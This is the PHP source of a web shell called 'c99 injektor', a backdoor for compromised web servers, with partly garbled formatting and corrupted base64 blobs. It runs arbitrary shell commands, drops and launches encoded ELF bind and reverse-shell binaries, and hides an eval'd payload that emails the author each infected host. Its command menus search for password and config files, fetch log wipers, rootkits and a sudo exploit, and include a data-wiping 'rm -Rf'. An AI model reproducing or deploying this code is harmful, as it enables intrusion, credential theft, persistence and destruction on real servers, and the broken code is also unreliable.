



```
<?php
/*****/
/* c99 injektor v1 06.2008 */
/* Re-coded and modified By garculas */
/* #kraksaan@irc.allnetwork.org */
/*****/
$sh_id = "amF0aW1jcmV3";
$sh_ver = "- exploit";
$sh_name = base64_decode($sh_id).$sh_ver;
$sh_mainurl = "http://kraksaans.co.cc";
$html_start = ".
'<html><head>
<title>'. $sh_name. ' - '.getenv("HTTP_HOST").'</title>
<style type="text/css">
<!--
body,table { verdana;11px;color:white;background-color:black; }
table { width:100%; }
table,td { border:1px solid #808080;2;2;padding:5px; }
a { color:lightblue;text-decoration:none; }
a:active { color:#00FF00; }
a:link { color:#5B5BFF; }
a:hover { text-decoration:underline; }
a:visited { color:#99CCFF; }
input,select,option { font:8pt tahoma;color:#FFFFFF;2;border:1px solid #666666; }
textarea { color:#dedbde;font:fixedsys bold;border:1px solid #666666;2; }
.fleft { float:left;text-align:left; }
.fright { float:right;text-align:right; }
#pagebar { font:10pt tahoma;padding:5px; border:3px solid #1E1E1E; border-
collapse:collapse; }
#pagebar td { vertical-align:top; }
#pagebar p { font:8pt tahoma;}
#pagebar a { font-weight:bold;color:#00FF00; }
#pagebar a:visited { color:#00CE00; }
#mainmenu { text-align:center; }
#mainmenu a { text-align: center;padding: 0px 5px 0px 5px; }
#maininfo,.barheader,.barheader2 { text-align:center; }
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#maininfo td { padding:3px; }
.barheader { font-weight:bold;padding:5px; }
.barheader2 { padding:5px;border:2px solid #1F1F1F; }
.contents,.explorer { border-collapse:collapse;}
.contents td { vertical-align:top; }
.mainpanel { border-collapse:collapse;padding:5px; }
.barheader,.mainpanel table,td { border:1px solid #333333; }
.mainpanel input,select,option { border:1px solid #333333; }
input[type="submit"] { border:1px solid #000000; }
input[type="text"] { padding:3px;}
.shell { background-color:#C0C0C0;color:#000080;padding:5px; }
.yxerrmsg { color:red; font-weight:bold; }
#pagebar,#pagebar p,h1,h2,h3,h4,form { 0; }
#pagebar,.mainpanel,input[type="submit"] { background-color:#4A4A4A; }
.barheader2,input,select,option,input[type="submit"]:hover { background-color:#333333; }
textarea,.mainpanel input,select,option { background-color:#000000; }
// -->
</style>
</head>
<body>
';
//Authentication
$login = "";
$pass = "";
$md5_pass = ""; //Password yg telah di enkripsi dg md5. Jika kosong, md5($pass).
$host_allow = array(""); //Contoh: array("192.168.0.*","127.0.0.1")
$login_txt = "Restricted Area"; //Pesan HTTP-Auth
$accessdeniedmess = "<a href=\"\$sh_mainurl\">\".\"$sh_name.\"</a>: access denied";
$gzipencode = TRUE;
$updatenow = FALSE; //Jika TRUE, update shell sekarang.
$c99sh_updateurl = $sh_mainurl."ipays.php";
$c99sh_sourcesurl = $sh_mainurl."passs.txt";
//$c99sh_updateurl = "http://www.utama-audio.com/ipays/tool/";
//$c99sh_sourcesurl = "http://www.utama-audio.com/ipays/tool/passs.txt";
$filestealth = TRUE; //TRUE, tidak merubah waktu modifikasi dan akses.
$curdir = ".";
$tmpdir = "";
$tmpdir_log = ".";
$log_email = "asyiek12@gmail.com"; //email untuk pengiriman log.

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$sort_default = "0a"; //Pengurutan, 0 - nomor kolom. "a"scending atau "d"escending
$sort_save = TRUE; //Jika TRUE, simpan posisi pengurutan menggunakan cookies.
$sess_cookie = "c99shvars"; //Nama variabel Cookie
$usefsbuff = TRUE; //Buffer-function
$copy_unset = FALSE; //Hapus file yg telah di-copy setelah dipaste
$hexdump_lines = 8;
$hexdump_rows = 24;
$win = strtolower(substr(PHP_OS,0,3)) == "win";
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc)) {
    $disablefunc = str_replace(" ", "", $disablefunc);
    $disablefunc = explode(",", $disablefunc);
}
//Functions
function get_phpini() {
    function U_wordwrap($str) {
        $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
        return @preg_replace('&([^\;]*)<wbr />([\;]*)!', '$1$2<wbr />', $str);
    }
    function U_value($value) {
        if ($value == "") return '<i>no value</i>';
        if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
        if ($value === null) return 'NULL';
        if (@is_object($value)) $value = (array) $value;
        if (@is_array($value)) {
            @ob_start();
            print_r($value);
            $value = @ob_get_contents();
            @ob_end_clean();
        }
        return U_wordwrap((string) $value);
    }
}
if (@function_exists('ini_get_all')) {
    $r = "";
    echo "<table><tr><td>Directive</td><td>Local Value</td><td>Global Value</td></tr>";
    foreach (@ini_get_all() as $key=>$value) {
        $r .= "<tr><td>".$key."</td><td><div align=center>".U_value($value['local_value'])."</div>";
    }
    $r .= "<td><div align=center>".U_value($value['global_value'])."</div></td></tr>";
}
}

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echo $r;
echo "</table>";
}
}
function disp_drives($curdir,$surl) {
    $letters = "";
    $v = explode("\\",$curdir);
    $v = $v[0];
    foreach (range("A","Z") as $letter) {
        $bool = $isdiskette = $letter == "A";
        if (!$bool) {$bool = is_dir($letter.":\");}
        if ($bool) {
            $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\").\"".
                ($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly,
otherwise an error may occur.')\":\"")."> [";
            if ($letter.":" != $v) {$letters .= $letter;}
            else {$letters .= "<font color=yellow>".$letter."</font>";}
            $letters .= "]\</a> ";
        }
    }
    if (!empty($letters)) {Return $letters;}
    else {Return "None";}
}
if (is_callable("disk_free_space")) {
    function disp_freespace($curdrv) {
        $free = disk_free_space($curdrv);
        $total = disk_total_space($curdrv);
        if ($free === FALSE) {$free = 0;}
        if ($total === FALSE) {$total = 0;}
        if ($free < 0) {$free = 0;}
        if ($total < 0) {$total = 0;}
        $used = $total-$free;
        $free_percent = round(100/($total/$free),2)."%";
        $free = view_size($free);
        $total = view_size($total);
        return "$free of $total ($free_percent)";
    }
}
}

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//w4ck1ng Shell

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if (!function_exists("myshellexec")) {
    if(is_callable("popen")) {
        function myshellexec($cmd) {
            if (!($p=popen("$cmd)2>&1","r"))) { return "popen Disabled!"; }
            while (!feof($p)) {
                $line=fgets($p,1024);
                $out .= $line;
            }
            pclose($p);
            return $out;
        }
    } else {
        function myshellexec($cmd) {
            global $disablefunc;
            $result = "";
            if (!empty($cmd)) {
                if (is_callable("exec") and !in_array("exec",$disablefunc)) {
                    exec($cmd,$result);
                    $result = join("\n",$result);
                } elseif (($result = $cmd) !== FALSE) {
                } elseif (is_callable("system") and !in_array("system",$disablefunc)) {
                    $v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents();
                    @ob_clean(); echo $v;
                } elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {
                    $v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result =
                    @ob_get_contents(); @ob_clean(); echo $v;
                } elseif (is_resource($fp = popen($cmd,"r"))) {
                    $result = "";
                    while(!feof($fp)) { $result .= fread($fp,1024); }
                    pclose($fp);
                }
            }
            return $result;
        }
    }
}

function ex($cfe) {
    $res = "";
    if (!empty($cfe)) {

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if(function_exists('exec')) {
    @exec($cfe,$res);
    $res = join("\n",$res);
} elseif(function_exists('shell_exec')) {
    $res = @shell_exec($cfe);
} elseif(function_exists('system')) {
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
} elseif(function_exists('passthru')) {
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r")) {
    $res = "";
    while(!@feof($f)) { $res .= @fread($f,1024); }
    @pclose($f);
} else { $res = "Ex() Disabled!"; }
}
return $res;
}
function which($pr) {
    $path = ex("which $pr");
    if(!empty($path)) { return $path; } else { return $pr; }
}
//End of w4ck1ng Shell

//Start Enumerate function
$hostname_x = php_uname(n);
$itshome = getcwd();
if (!$win) {
    $itshome = str_replace("/home/", "~", $itshome);
    $itshome = str_replace("/public_html", "/yx29sh.php", $itshome);
}
else { $itshome = ""; }
$enumerate = "http://".$hostname_x."/".$itshome."";
//End Enumerate function

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1eC5zby4yAAAEAAAAEAAAAEAAABHTIUAAAAAAAAIAAAACAAAABQAAABEAAAAUAAA
AAAAAAAAAAAAARAAAAEgAAAAcAAAAKAAACwAAAAgAAAAPAAAAwAAAAAAAAAAAA
AAAAAAAAABAAAAAAAAAAEwAA
FAAABgAAAAAAAAABAAAAAAAAAAkAAAAAAAAADAAAAAAAAAAAAAAAAADQAAAA4AA
AACAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAAAAAABwBAAASAAAArAAAAA
AAABxAAAAEgAADwAAAAAAAAACwIAABIAABIAAAAAAAAAAH0AAASAAAAjAAAAAA
AACsAQAAEgAAKUAAAAAAAAArwAAABIAABjAAAAAAAAACcAAAASAAAAkwAAAAA
AADdAAAAEgAAEMAAAAAAAAAOgAAABIAABcAAAAAAAAAKoBAAASAAAAVgAAAAA
AAAA2AAAAEgAAAHMAAAAAAAAAA2QAAABIAAB4AAAAAAAAACgAAAASAAAAbQAAAA
AAAAAOAAAAEgAAAC4AAAAAAAAAeAAAABIAAB9AAAA8lgECAQAAARAA4ATwAAAA
AAAAA5AAAAEgAAAEAAAAAAAAAAAAAAAAACAAAAVAAAAAAAAAAAAAAAAAAgAAAAAF9Kdl
9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18AbGliYy5zby42AGNvbm5lY3QAZXhl
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h0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNIZABkYWVtb24AX19saWJjX3N0YXJ0X21h
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CAIAAgACAAEAAGAAAAAAAAQABACQAAAAQAAAAAAAAABBpaQ0AAAIAsgAAAAAAAA
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DVYnIU+gAAAAAW4HDMxEAAFD0v3//1lbycMAAAMAAAABAAIAcm0gLWYgAAAAAAAAA

AAAAAAAAAAWY1dlGNvbm5lY3QoKQBzaCAtaQAvYmluL3NoAAAAAAAAAAD/////AAAAAP
///8AAAAAAAAAAAAEAAAAkAAAADAAAALCEBAgNAAAA0lgECAQAAABlgQQIBQAAACSD
BAgGAAAA5IEECAoAAAC8AAAACwAAABAAAAA/AAAAAAAAAAAAAMAAAAMmgQlAgAAAIAA
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///9vAQAAAPD//2/ggwQIAAA
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QILoUECD6FBAhOhQQIXoUECG6FBAh+hQQljoUECJ6FBAiuhQQlvoUECM6FBAgAAAAAA
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KQAAR0NDOiAoR05VKSazLjQuNSAyMDA1MTlwMSAoUmVklEhhdCAzLjQuNS0yKQAAR0
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05VKSazLjQuNSAyMDA1MTlwMSAoUmVklEhhdCAzLjQuNS0yKQAAR0NDOiAoR05VKSaz
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yMDA1MTlwMSAoUmVklEhhdCAzLjQuNS0yKQAALnN5bXRhYgAuc3RydGFiAC5zaHN0cnR
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AA
AA
AABMAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAlwAAAAcAAAACAAAkIEECCgBAAAgAAAAAA
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QAAAGSaBAgBAAAAAQAXAFUAAAAghgQIAAAAAIADABrAAAAVIYECAAAAACAawAE
QAAAAAAAAAAAAABADx/3cAAAAwmmQQIAAAAAEAEACEAAAAOJkECAAAAAABABEA
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4gAAAAAAABxAAAAEgAAAPMAAADsiAQIBAAAABEADgD6AAAAAAASCAAASAAAA
DAEAACyZBAgAAAAEALx/x0BAABcmgQIAAAAAABECFgAqAQAAalgECEIAAASAAwAOg
EAAAAAAAB9AAAAEgAAAEwBAACwhAQIAAAAAABIACgBSAQAAAAAAKwBAAASAAAAZ
AEANiFBAgAAAAEgAMAGsBAAAAAAArwAAABIAAAB9AQAALJkECAAAAAAQAvH/kA
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EAAICGBAiTAQAAEgAMAMYBAAAAAAA3QAAABIAADjaQAALJkECAAAAAAQAvH/9AE
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AANCIBAgAAAAEgANACcCAAasmQQIAAAAAABAC8f87AgAAAAAADYAAAASAAAATAIA
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AAAB4AAAAEgAAALICAAasmQQIAAAAAABAC8f/FAgAA8lgECAQAAAAARAA4A1AIAAFiaBA
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BAgAAAAEALx/x0DAAAAAAAAAAAAACAAAAAY2FsbF9nbW9uX3N0YXJ0AGNydHN0d
WZmLmMAX19DVE9SX0xJU1RyxwByx0RUT1JfTEITVF9fAF9fSkNSX0xJU1RyxwBwLjAAY2
9tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4AGZyYW1lX2R1bW15AF9fQ1RPUI9FT
kRyxwByx0RUT1JfRU5EX18AX19GUkFNrv9FTkRyxwByx0pDUI9FTkRyxwByx2RvX2dsb2J
hbF9jdG9yc19hdXgAYmFjay5jAGV4ZWNSQEBHTEICQ18yLjAAX0RZTkFNSUMAY2xvc2VA
QEdMSUJDXzluMABfZnBfaHcAcGVycm9yQEBHTEICQ18yLjAAX19maW5pX2FycmF5X2Vu
ZAByx2Rzb19oYW5kbGUAX19saWJjX2NzdV9maW5pAHN5c3RlBUBAR0xJQkNfMi4wAF9pb
ml0AGRhZW1vbKBAR0xJQkNfMi4wAF9zdGFydABzdHJsZW5AQEdMSUJDXzluMAByx2Zpb
mlfYXJyYXlfc3RhcncQAX19saWJjX2NzdV9pbml0AGluZXRfYWRkckBAR0xJQkNfMi4wAF9fYn
NzX3N0YXJ0AG1haW4AX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzluMAByx2luaXRfYX

JyYXlfZW5kAGR1cDJAQEdMSUJDXzluMABzdHJjYXRhX3N0YXJ0AF9maW5pAF9fcHJlaW5pdF9hcnJheV9lbnQAYnplcm9AQEdMSUJDXzluMABLEGI0QEBHTEICQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9IZGF0YQBfR0xPQkFMX09GRINFVF9UQUJMRV8AX2VuZABodG9uc0BAR0xJQkNfMi4wAGNvb5IY3RAQEdMSUJDXzluMAByx2luaXRfYXJyYXlf3RhcncQAX0IPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19wcmVpbml0X2FycmF5X3N0YXJ0AF9fZ21vbl9zdGFydF9fAA==";

\$backdoor =

"f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAoIUECDQAAAD4EgAAAAAAAAADQAIAAHACgAlgAfAAYAAAA0AAAAANIAECDSABAjgAAAA4AAAAUAAAAEAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAEAAAAABAAAAAACABAgAgAQlRkAAKwJAAAFAAAAABAAAAEAAACsCQAARjKcEckYzBAG0AQAAOAEAAAYAAAAEAAAAgAAAMAJAADAmQQlwJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAAACiBBAgogQQIIAAAACAAAAEAAAA BAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAYAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAEAAAABHTIUAAAAAAAAIAAAACAAAAAABEAAAATAAAAA AAAAAAAAAQAAAEQAAAAAAAAAAAAAAAAACQAAAgAAAFAAAAwAAAA0AAAAAAAA AAAAAA8AAAAKAAAEgAA AAAAAAAAAAYAAABAAAAAAAAAAcAAAALAAAAAAAAAQAAAMAAAADgAAAAIAAAAA AAAAAAAAAAAAAAAAAAAAAAC4AAAAAAAAAdQEABIAAACgAAAAAAAAHEAAAAS AAAANAAAAAAAAADMAAAEGAAAGoAAAAAAAAAWgAAABIAABMAAAAAAAAAAHgAAA ASAAAAYwAAAAAAAAA5AAAEgAAAFgAAAAAAAAAQAAABIAACOAAAAAAAAAOYAA AASAAAAOwAAAAAAAAA6AAAEgAAAFMAAAAAAAAAAQAAABIAAAB1AAAAAAAAALka AAASAAAegAAAAAAAAArAAAEgAAAEcAAAAAAAAeAAAABIAAABvAAAAAAAAA4A AAASAAAfwAAAEiJBAgEAAAEQAOAEAAAAAAAAAQAAABIAAABAAAAAAAAAAAA AAAAgAAAFQAAAAAAAAAAAAAAAAIAAAAABfSnZfUmVnaXN0ZXJDbGFzZ2VzAF9fZ21vbl9 zdGFydF9fAGxpYmMuc28uNgBleGVjbABwZXJyb3IAZHVwMgBzb2NrZXQAc2VuZABhY2Nlc HQAYmluZABzZXRzb2Nr3B0AGxpc3RlbgBmb3JrAGh0b25zAGV4aXQAYXRvaQBfSU9fc3 RkaW5fdXNIZAByx2xpYmNfc3RhcncRfbWFpbGJjbG9zZQBHTEICQ18yLjA AAAACAAIAAgACAAIAAgACAAIAAQACAAAAAAAAAAEAAQAKAAAAEAAAAAAAAAAQ aWkNAACAkYAAAAAAAAAAiJoECAYSAACYmgQIBwEAAJyaBAGHAgAAoJoECACDAACkm gQIBwQAAKiaBAGHBQAARJoECACGAACwmgQIBwCAALSaBAGHCAAUJoECACJAAC8mg QIBwoAAMCaBAGHCwAAxJoECACMAADlmgQIBw0AAMyaBAGHDgAA0JoECACQAABVieW D7AjoMQEAAOiDAQAA6FsEAADJwwD/NZCaBAj/JZSaBAGAAAAA/yWYmgQlaAAAAADp4P/ ///8lnJoECGgIAAAA6dD/////JaCaBAhoEAAAAOnA/////yWkmgQlaBgAAADpsP///8lqJoECGgA AAA6aD/////JayaBAhoKAAAAOmQ/////yWwmgQlaDAAAADpgP///8ltJoECGg4AAAA6XD/////Jb iaBAhoQAAAAOlG/////yW8mgQlaEgAAADpUP///8lwJoECGhQAAAA6UD/////JcSaBAhoWAAA AOkw/////yXlmgQlaGAAAADpIP///8lzJoECGhoAAAA6RD/////JdCaBAhocAAAAOkA///Me1eie GD5PBQVFJorYgECGhciAQIUVZoQIYECOhf/////9JCQVYnIU+gbAAAAGcO/FAAAg+wEi4P8/// hcB0Av/Qg8QEW13Dixkw1WJ5YPsCIA94JoECAB0DOscg8AEo9yaBAj/0qHcmgQlixCF0nX

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XNzZXMAX19nbW9uX3N0YXJ0X18A";

```
function cf($fname,$text) {  
    $w_file=@fopen($fname,"w") or err();  
    if($w_file) {  
        @fputs($w_file,@base64_decode($text));  
        @fclose($w_file);  
    }  
}
```

```
function cfb($fname,$text) {  
    $w_file=@fopen($fname,"w") or bberr();  
    if($w_file) {  
        @fputs($w_file,@base64_decode($text));  
    }  
}
```

```

    @fclose($w_file);
}
}
function err() { $_POST['backconnmsg']="<br><br><div>Error:</div> Can't connect!"; }
function bberr() { $_POST['backconnmsg']="<br><br><div>Error:</div> Can't backdoor
host!"; }

if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd")) {
    $ip = gethostbyname($_SERVER["HTTP_HOST"]);
    $por = $_POST['backconnectport'];
    if (is_writable(".")) {
        cfb("shbd",$backdoor);
        ex("chmod 777 shbd");
        $cmd = "./shbd $por";
        exec("$cmd > /dev/null &");
        $scan = myshellexec("ps aux");
    } else {
        cfb("/tmp/shbd",$backdoor);
        ex("chmod 777 /tmp/shbd");
        $cmd = "./tmp/shbd $por";
        exec("$cmd > /dev/null &");
        $scan = myshellexec("ps aux");
    }
    if (eregi("./shbd $por",$scan)) {
        $data = ("\n<br>Backdoor setup successfully.");
    } else {
        $data = ("\n<br>Process not found, backdoor setup failed!");
    }
    $_POST['backconnmsg']="To connect, use netcat! Usage: <b>'nc $ip $por'</b>.$data";
}

if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) &&
($_POST['use']=="Perl")) {
    if (is_writable(".")) {
        cf("back",$back_connect_pl);
        $p2 = which("perl");
        $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
        if (file_exists("back")) { unlink("back"); }
    } else {

```

```

cf("/tmp/back",$back_connect_pl);
$p2 = which("perl");
$blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
if (file_exists("/tmp/back")) { unlink("/tmp/back"); }
}
$_POST['backconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port
<b>".$_POST['backconnectport']."</b>.";
}

```

```

if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) &&
($_POST['use']=="C")) {
if (is_writable(".")) {
cf("backc",$back_connect_c);
ex("chmod 777 backc");
$blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
if (file_exists("backc")) { unlink("backc"); }
} else {
ex("chmod 777 /tmp/backc");
cf("/tmp/backc",$back_connect_c);
$blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); }
}
$_POST['backconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port
<b>".$_POST['backconnectport']."</b>.";
}

```

//End of Backdoor

//Starting calls

```

@ini_set("max_execution_time",0);
if (!function_exists("getmicrotime")) {
function getmicrotime() {
list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);
}
}

```

```

error_reporting(5);
@ignore_user_abort(TRUE);
@set_magic_quotes_runtime(0);
define("starttime",getmicrotime());
$shell_data =

```

```
"JHZpc2l0Y291bnQgPSAkSFRUUF9DT09LSUVfVkFSU1sidmlzaXRzIi07IGlmKCAkdmlzaXRj
b3Vu
dCA9PSAiIikgeyR2aXNpdGNvdW50ID0gMDsgJHZpc2l0b3lgPSAkX1NFUIZFUIsiUkVNT1Ry7
7+9
QUREUiJdOyAkd2ViID0gJF9TRVJWRVJbIkhUVFBfSE9TVcJdOyAkaW5qID0gJF9TRVJWR
VJbIiJF
UVVFU1RfVJJII07ICR0YXJnZXQgPSByYXd1cmxkZWVvZGUoJHdlYi4kaW5qKTsgJGJvZH
kgPSAi
Qm9zcywgdGhlcmUgd2FzIGFulGluamVjdGVkIHRhcmdldCBvbiAkdGFyZ2V0IGJ5ICR2aXNp
dG9y
ljsgQG1haWwolmFzeWllazEyQGdtYWlsLmNvbSIsIHRhcmdldCBodHRwOi8vJHRhcmdldCBie
SAk
dmlzaXRvcilslClkYm9keSlpOyB9IGVsc2UgeyAkdm1zaXRjb3VudDsgfSBzZXRjb29raWUoInZ
p
c2l0cyIsJHZpc2l0Y291bnQpOw==" ; eval(base64_decode($shell_data));
if (get_magic_quotes_gpc()) {
    if (!function_exists("strips")) {
        function strips(&$arr,$k="") {
            if (is_array($arr)) {
                foreach($arr as $k=>$v) {
                    if (strtoupper($k) != "GLOBALS") { strips($arr["$k"]); }
                }
            } else {$arr = stripslashes($arr);}
        }
    }
    strips($GLOBALS);
}
//CONFIGURATIONS
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and
save it in SURL.
foreach($_REQUEST as $k=>$v) { if (!isset($$k)) {$$k = $v;} }
if ($surl_autofill_include) {
    $include = "&";
    foreach (explode("&",$getenv("QUERY_STRING")) as $v) {
        $v = explode("=", $v);
        $name = urldecode($v[0]);
        $value = urldecode($v[1]);
        foreach (array("http://", "https://", "ssl://", "ftp://", "\\\\") as $needle) {
```

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if (strpos($value,$needle) === 0) {
    $includestr .= urlencode($name)."=".urlencode($value)."&";
}
}
}
}
if (empty($surl)) {
    $surl = "?".$includestr; //Self url
}
$surl = htmlspecialchars($surl);

// Registered file-types.
$ftypes = array(
    "html"=>array("html","htm","shtml"),
    "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
    "exe"=>array("sh","install","bat","cmd"),
    "ini"=>array("ini","inf","conf"),
    "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
    "img"=>array("gif","png","jpeg","jif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
    "sdb"=>array("sdb"),
    "phpsess"=>array("sess"),
    "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
);
//Registered executable file-types.
$exeftypes = array(
    getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
    "perl %f%" => array("pl","cgi")
);
//Highlighted files.
$regexp_highlight = array(
    array(basename($_SERVER["PHP_SELF"]),1,"<font color=#FFFF00>","</font>"),
    array(".tgz$",1,"<font color=#C082FF>","</font>"),
    array(".gz$",1,"<font color=#C082FF>","</font>"),
    array(".tar$",1,"<font color=#C082FF>","</font>"),
    array(".bz2$",1,"<font color=#C082FF>","</font>"),
    array(".zip$",1,"<font color=#C082FF>","</font>"),
    array(".rar$",1,"<font color=#C082FF>","</font>"),
    array(".php$",1,"<font color=#00FF00>","</font>"),
    array(".php3$",1,"<font color=#00FF00>","</font>"),

```

```

array("\.php4$",1,"<font color=#00FF00>","</font>"),
array("\.jpg$",1,"<font color=#00FFFF>","</font>"),
array("\.jpeg$",1,"<font color=#00FFFF>","</font>"),
array("\.JPG$",1,"<font color=#00FFFF>","</font>"),
array("\.JPEG$",1,"<font color=#00FFFF>","</font>"),
array("\.ico$",1,"<font color=#00FFFF>","</font>"),
array("\.gif$",1,"<font color=#00FFFF>","</font>"),
array("\.png$",1,"<font color=#00FFFF>","</font>"),
array("\.htm$",1,"<font color=#00CCFF>","</font>"),
array("\.html$",1,"<font color=#00CCFF>","</font>"),
array("\.txt$",1,"<font color=#C0C0C0>","</font>")
);
//Command Aliases
if (!$win) {
$cmdaliases = array(
array("", "ls -al"),
array("Find all suid files", "find / -type f -perm -04000 -ls"),
array("Find suid files in current dir", "find . -type f -perm -04000 -ls"),
array("Find all sgid files", "find / -type f -perm -02000 -ls"),
array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"),
array("Find config.inc.php files", "find / -type f -name config.inc.php"),
array("Find config* files", "find / -type f -name \"config*\""),
array("Find config* files in current dir", "find . -type f -name \"config*\""),
array("Find all writable folders and files", "find / -perm -2 -ls"),
array("Find all writable folders and files in current dir", "find . -perm -2 -ls"),
array("Find all writable folders", "find / -type d -perm -2 -ls"),
array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"),
array("Find all service.pwd files", "find / -type f -name service.pwd"),
array("Find service.pwd files in current dir", "find . -type f -name service.pwd"),
array("Find all .htpasswd files", "find / -type f -name .htpasswd"),
array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
array("Find all .bash_history files", "find / -type f -name .bash_history"),
array("Find .bash_history files in current dir", "find . -type f -name .bash_history"),
array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
array("List file attributes on a Linux second extended file system", "lsattr -va"),
array("Show opened ports", "netstat -an | grep -i listen")
);
$cmdaliases2 = array(

```

```

    array("wget & extract psyBNC","wget ".$sh_mainurl."psy.tar.gz;tar -zxf psy.tar.gz;cd
.psy;./config 2020;./fuck;perl psy;./run"),
    array("wget & extract EggDrop","wget ".$sh_mainurl."httpd.tar.gz;tar -zxf httpd.tar.gz"),
    array("-----",""),
    array("Logged in users","w"),
    array("Last to connect","lastlog"),
    array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm
-4000 2> /dev/null"),
    array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
    array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),
    array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
    array("CPU Info","cat /proc/version /proc/cpuinfo"),
    array("Is gcc installed ?","locate gcc"),
    array("Format box (DANGEROUS)","rm -Rf"),
    array("-----",""),
    array("wget WIPELOGS PT1","wget
http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c"),
    array("gcc WIPELOGS PT2","gcc zap2.c -o zap2"),
    array("Run WIPELOGS PT3","./zap2"),
    array("-----",""),
    array("wget RatHole 1.2 (Linux & BSD)","wget
http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),
    array("wget & run BindDoor","wget ".$sh_mainurl."tool/bind.tar.gz;tar -zxvf
bind.tar.gz;./4877"),
    array("wget Sudo Exploit","wget
http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"),
);
}
else {
    $cmdaliases = array(
        array("", "dir"),
        array("Find index.php in current dir", "dir /s /w /b index.php"),
        array("Find *config*.php in current dir", "dir /s /w /b *config*.php"),
        array("Find c99shell in current dir", "find /c \"c99\" *"),
        array("Find r57shell in current dir", "find /c \"r57\" *"),
        array("Show active connections", "netstat -an"),
        array("Show running services", "net start"),
        array("User accounts", "net user"),
        array("Show computers", "net view"),

```

```

);
}
//PHP Filesystem Functions, FaTaLiSTiCz_yx TriCkz
$phpfsaliases = array(
    array("Read File", "read"),
    array("Write File (PHP5)", "write"),
    array("Copy", "copy"),
    array("Rename/Move", "rename"),
    array("Delete", "delete"),
    array("Make Dir", "mkdir"),
    array("-----", ""),
    array("Download", "download"),
    array("Download (Binary Safe)", "downloadbin"),
    array("Change Perm (0755)", "chmod"),
    array("Find Writable Dir", "fwritabledir"),
    array("Find Pathname Pattern", "glob"),
);

```

```
//Quick launch
```

```

$quicklaunch1 = array(
    array("<img src='\"'\"'. $surl.\"act=img&img=home\" alt='\"Home\"' border='\"0\"'>\", $surl),
    array("<img src='\"'\"'. $surl.\"act=img&img=back\" alt='\"Back\"' border='\"0\"'>\", \"#\
onclick='\"history.back(1)\""),
    array("<img src='\"'\"'. $surl.\"act=img&img=forward\" alt='\"Forward\"' border='\"0\"'>\", \"#\
onclick='\"history.go(1)\""),
    array("<img src='\"'\"'. $surl.\"act=img&img=up\" alt='\"Up\"
border='\"0\"'>\", $surl.\"act=ls&d=%upd&sort=%sort\""),
    array("<img src='\"'\"'. $surl.\"act=img&img=search\" alt='\"Search\"
border='\"0\"'>\", $surl.\"act=search&d=%d\""),
    array("<img src='\"'\"'. $surl.\"act=img&img=buffer\" alt='\"Buffer\"
border='\"0\"'>\", $surl.\"act=fsbuff&d=%d\"")
);

```

```

$quicklaunch2 = array(
    array("Enumerate", $enumerate),
    array("Security Info", $surl.\"act=security&d=%d\"),
    array("Processes", $surl.\"act=processes&d=%d\"),
    array("MySQL", $surl.\"act=sql&d=%d\"),
    array("PHP-Code", $surl.\"act=eval&d=%d\"),
    array("Encoder", $surl.\"act=encoder&d=%d\"),
);

```

```

array("Mailer",$surl."act=yxmailer"),
